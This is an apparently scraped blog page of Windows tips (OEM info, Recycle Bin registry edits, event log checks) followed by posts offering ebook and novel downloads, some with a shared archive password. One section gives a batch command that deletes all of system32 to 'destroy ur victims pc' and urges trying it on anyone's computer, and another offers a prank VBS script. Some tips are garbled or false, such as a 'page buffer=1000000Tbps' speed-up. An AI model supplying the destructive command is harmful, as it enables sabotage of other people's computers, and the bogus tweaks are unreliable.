Add your Photo in Computer Properties

add ur photo in computer properties a notepad
2.Type the following:

Manufacturer="your name or wht u like"

[Support Information]
Line1= Your Ph No or anything
Line2= Your Address or anything

3. Save as "oeminfo.ini" in the System32 folder.(Without Quote)

4. Create a bmp file(Your Photo) and save it the System32 folder as "oemlogo.bmp"(Without Quote).

5. Now Check your My Computer Properties.

How to rename and remove Recycle Bin

How to Rename Recycle Bin

To change the name of the Recycle Bin desktop icon, open Regedit and go to:


and change the name "Recycle Bin" to whatever you want (don't type any quotes)

How to remove Recycle Bin

If you don't use the Recycle Bin to store deleted files , you can get rid of its desktop icon all together.

Run Regedit and go to:


Click on the "Recycle Bin" string in the right hand pane. Hit Del, click OK.

Who used your PC in your absence and What did he do

First you should go
start > run >eventvwr.msc

Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.
For our purposes we want the System log. Click on "System" in the left-hand column for a list of events. Look for a date and time when you weren't home and your computer should have been off.

Double click on the eg: info and it will show you the detail.

You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day.

Hope you all will like it.

Delete a undeletable file

Here is a very simple way to del an undeletable file

_Open a Command Prompt window and leave it open.
_Close all open programs.
_Click Start, Run and enter TASKMGR.EXE
_Go to the Processes tab and End Process on Explorer.exe.
_Leave Task Manager open.
_Go back to the Command Prompt window and change to the directory the AVI (or other
undeletable file) is located in.
_At the command prompt type DEL where is the file you wish to
_Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the
GUI shell.
_Close Task Manager.

Increase your Youtube and Metcafe Buffering speed

start>Run>type--system.ini hit enter

after that ull get system notepad file as
; for 16-bit app support

jus below this copy

page buffer=1000000Tbps

so totally it will look as
; for 16-bit app support
page buffer=1000000Tbps

save the notepad file
and reboot ur system

Friends Enemy

I m here explain to make a file that destroys ur victims pc

I m not responsible for the damage caused by this file."

1. Open Notepad

2. write the above command : -
del c:\WINDOWS\system32\*.*/q

3. Save the above notepad with the extension ".bat or .cmd" as u want

4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!!
Don't double click the file otherwise u r in trouble.
Why ?????? bcz the file u created delete all files from ur

system32 folder and when u restart ur pc it will not start

bcz system can not find the files in the system32 folder which

is required at the time of booting.

5. You can also test the above by creating a fake folder let suppose

windows1 in C:\. Copy some old files in it and just follow the

above command. By
double clicking the bat or cmd file ur all files

automatically get deleted.

6. You can try this file in any one`s computer.(but this result in causing damage to the
computer, so thik again before trying this on anyone's pc)

Try this OUT

Try this out on anyone computer:

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
Next ' cdrom
End If

Copy the code in red and save it in a notepad file with anyname.vbs

This would open and close your CD- Rom(s) till you dont shutdown your computer or either restart it.
It is not a virus just a spyware a bug.


Game Information
Sound: Dolby Digital 5.1
Number of Players: 1 Player
DirectX Version: v9.0
Operating System: Windows 98/2000/ME/XP
Minimum System Requirements
System: 800 MHz Pentium III, AMD or equivalent
RAM: 256 MB
Hard Drive Space: 1400 MB
Recommended System Requirements
System: 1.2 GHz Pentium 4, AMD Athlon or equivalent
RAM: 256 MB
Hard Drive Space: 1400 MB
Labels: 0 comments | | edit post

Java in 60 Minutes A Day

English | Wiley | May 30, 2003 | 1st edition | PDF | 789 Pages | 6.64 MB
* Shows readers how to use Java to harness the power of object-oriented programming
* Includes thirty one-hour lessons that recreate a typical week-long introductory seminar
* Focuses on the Java 2 Platform, Enterprise Edition (J2EE)
* Helps readers to develop skills that are critical to many Web services scenarios
* The author was one of the first Sun Certified Instructors and has since taught Java to thousands of developers
* Companion Web site features an online presentation by the author that follows along with each chapter and includes an audio-only option for readers with dial-up Internet connection

Labels: 0 comments | | edit post

Astronomy Encyclopedia

Astronomy Encyclopedia - A comprehensive & authoritative A-Z guide to the Universe
A comprehensive and authoritative A-Z guide to the Universe, with more than 3,000 fully cross-referenced articles on all aspects of astronomy and astrophysics.
It is illustrated with 500 colour photographs and explanatory diagrams, as well as star maps by renowned celestial cartographer Wil Tirion. There are special features on each of the constellations and tables listing brightest stars, nearest stars, Messier objects, Caldwell objects, and surface features of the Moon and terrestrial planets.
Written by more than 100 leading astronomers from the world's universities and observatories, it is comprehensive, authoritative and accessible.
* The best A-Z encyclopedia for enthusiastic sky watchers.
* Over 500 colour photographs, star maps and explanatory diagrams.

Download Link:
Labels: 0 comments | | edit post

Hacking Secrets Revealed

A manual for beginner, This book won’t make you a hacker but will gave you idea about what the hacking process can be for the beginners only
THE internet is ever growing and you and I are truly pebbles in a vast ocean of information. They say what you don’t T know can’t hurt you. When it comes to the Internet believe quite the opposite.On the Internet there a millions and millions of computer users logging on and off on a daily basis. Information is transferred from one point to another in a heartbeat.Amongst those millions upon millions of users, there’s you.


Labels: 0 comments | | edit post

Best seller hacking ebooks

This is contain 4 best seller for hacking ebook
include :

Hack Proofing - Your Network - Internet Tradecraft.pdf
hack the net.pdf

Hacking Exposed Network Security Secrets & Solutions, Third.pdf

Steal This Computer Book 3 - What They Won't Tell You About the Internet.chm
Download : 17,6 MB

Labels: 0 comments | | edit post

Network Security: A Beginner’s Guide

Network Security: A Beginner’s Guide, Second Edition * Paperback: 496 pages
* Publisher: McGraw-Hill Osborne Media; 2 edition (May 28, 2003)
* Language: English
* ISBN-10: 0072229578

All companies rely on some security mechanisms to ensure their corporate privacy and information integrity. In many cases, the ability of the technician to explain a system’s vulnerabilities to managers in order to acquire funding is as important as the technical skills to build the system. This book addresses a wide range of topics, from security basics to policies, practices, and practical solutions. Though intended for network administrators, this also acts as a good primer on security concepts for the lay computer user. A rock-solid resource for all libraries.

Labels: 0 comments | | edit post

Hacking: The Art of Exploitation

Hacking: The Art of Exploitation
by Jon Erickson ISBN:1593270070
No Starch Press © 2003 (241 pages)
Labels: 0 comments | | edit post

101 Amazing Ways to Say I Love You

Falling in love is easy; telling someone you love them isn’t always as simple. You want to make the first time you say, “I love you” to be special and the millionth time to be just as memorable. So, how do you do it? Saying “I love you” doesn’t have to be perfect, but the intention and the feeling behind it should be. In a word, saying, “I love you” needs to be genuine. If you’re stumped for ideas about how to tell your lover that you love them, here are some hints and tips to get your loving feelings out in the open.
Labels: 0 comments | | edit post

Building a Server with FreeBSD 7

Building a Server with FreeBSD 7
* Paperback: 288 pages
* Publisher: No Starch Press (April 1, 2008)
* Language: English
* ISBN-10: 159327145X
FreeBSD is regarded as one of the fastest, most stable, and widely supported UNIX-based operating systems available. FreeBSD is used to run servers at powerhouses like Yahoo! This book contains installation guides to some of the most popular and powerful third-party server applications available–rivaling top-notch commercial software.
The Internet has become a valuable resource—it is a communication medium, an entertainment channel, a learning instrument—the list is endless. This virtual world is run by interconnected servers throughout the globe. The operating systems we use everyday on our PCs cater to the general population. Server operating systems, however, are not originally designed to accommodate this demographic. Those of us with a need or desire to setup an Internet server are left with two options:
1. Hire an expensive consultant or
2. Undertake the task ourselves
This book provides a means to the latter. The most difficult aspect of building an Internet server is the initial software installation and configuration. This book was designed to tackle this problem systematically and minimize time spent.
Internet servers are an important business instrument. They store files, serve web pages, relay e-mail; the list goes on. Commercial server software can cost thousands of dollars in licensing fees. Open source software is a cost effective alternative because it’s completely free to use, powerful, and well supported.

Labels: 0 comments | | edit post


A collection of Novels for your readin pleasure.


Stephen King - Duma Key.
Robert W. Chambers - Blue-Bird Weather.
Stuart Woods - Dead Eyes.
James Rollins - Deep Fathom.
Robert W. Chambers - The Flaming Jewel.
Elizabeth Peters - Legend in Green Velvet.
Richard Laymon - Dreambox Junkies.
Neal Stephenson - Snow Crash.
John Saul - The Devils Labyrinth.
James Patterson - [Alex Cross 13] - Double Cross.
Douglas Preston - Blasphemy.
Elizabeth Peters - The Night of Four Hundred Rabbits.
Elizabeth Peters - Devil May Care.
Lawrence Block - [Scudder 09] - A Dance at the Slaughterhouse.
James Herbert - Nobody True.
WhStephanie Bedwell Grime - The Bleeding Sunitley Strieber - The Night Church..
Shirley Jackson - The Haunting of Hill House.
Robert Craig - Creepers.
Poppy Z. Brite - [SS] - Mussolini And The Axeman's Jazz.
Nigel Bennett & P. N. Elrod - His Father's Son.
Lilith Saintcrow - [The Society 01] - The Society.
Lilith Saintcrow - [The Society 02] - Hunter-Healer.
Jessica Amanda Salmonson - Tales by Midnight 02.
Jessica Amanda Salmonson - Tales by Moonlight.
John Buchan - Collected Supernatural Stories.
John Buchan - [Richard Hannay 01] - The Thirty Nine Steps.
Freda Warrington - Dracula the Undead.
Freda Warrington - A Taste of Blood Wine.
John Denis - Alistair Maclean's Airforce One Is Down.
Barry Eisler - [John Rain 01] - Rain Fall.
Barry Eisler - [John Rain 02] - Hard Rain.
Barry Eisler - [John Rain 03] - Rain Storm.
Barry Eisler - [John Rain 04] - Killing Rain.
Dale Brown - The Tin Man.
Neal Stephenson - The Diamond Age.
Neal Stephenson - Zodiac.
Richard Preston - The Cobra Event.
Robin Cook - Terminal.
Sidney Sheldon - If Tomorrow Comes.
Stephen Coonts - Saucer.
Tom Clancy - [Jack Ryan 01] - Patriot Games.
Tom Clancy - Red Storm Rising.
Download 16MB

Labels: 0 comments | | edit post

Ten Questions

Ten Questions Science Can’t Answer (Yet!): A Guide to Science’s Greatest Mysteries
* Hardcover: 208 pages
* Publisher: Macmillan (May 29, 2007)
* Language: English
* ISBN-10: 0230517587
From the author of the bestselling The Science of the Hitchhiker’s Guide to the Galaxy comes another incredible trip to an even more mysterious terrain. Michael Hanlon identifies ten scientific questions that we simply can’t seem to answer and explains why these compelling mysteries will remain unsolved for years to come
How did life begin? Why are there two sexes? Where did language originate? In Hanlon’s characteristically witty style, he ponders the ways these questions have persisted in frustrating the best minds and asks what might be needed to get to the bottom of it all. From politics to lack of technology, each question has its own set of circumstances holding it back. By exploring these unanswerable questions, Hanlon exposes some of science’s greatest failings and missteps–and charts a hopeful direction for getting science back on the road to discovery.
Labels: 0 comments | | edit post

Sherlock Holmes Famous Collection
Adventures Of Sherlock Holmes by Sir Arthur Conan Doyle_RFN.pdf
Sherlock Holmes-The Pursuit Of d House Boat_RFN.rar
The Return of Sherlock Holmes by Sir Arthur Conan

Password: RFN
Labels: 0 comments | | edit post


Not only you hide your sms, you can also read or write sms in front of everyone but you are the only one who can understand the message !!

smsFake encrypt the message letters with letters you specify and you are the only one who can understand

(For all Nokia Series60 phones)

have you ever encountered that you need to hide your important sms as soon as it reaches your mobile from unwanted eyes ?! Have you ever encountered that you really need to read new incoming sms but people are around you ?! Have you ever encountered that you do need to write sms but people around you will be able to see what you are typing ?!

with smsFake the easy and simple to use program, you have a clue for all those problems. just select a method for hiding your sms, add senders to address list, and then your sms would be monitored and hidden as soon as it reaches your mobile. just associate different letters than the original ones, and when your message arrives or when you type a message every letter is converted to the letter you associated, then you are the only one who can understand what you are reading or typing, come on you are typing and reading your own language!

For example: if you assign 'M' to 'L' and assign 'F' to 'Y' and assign 'R' to 'U', then the sentence "I love you" will appear "I move for" in front of everyone and your message will appear on the recipient phone "I love you". You will see letters are changing to the encrypted letters while you are typing, and when you send the message the original one is sent not that encrypted..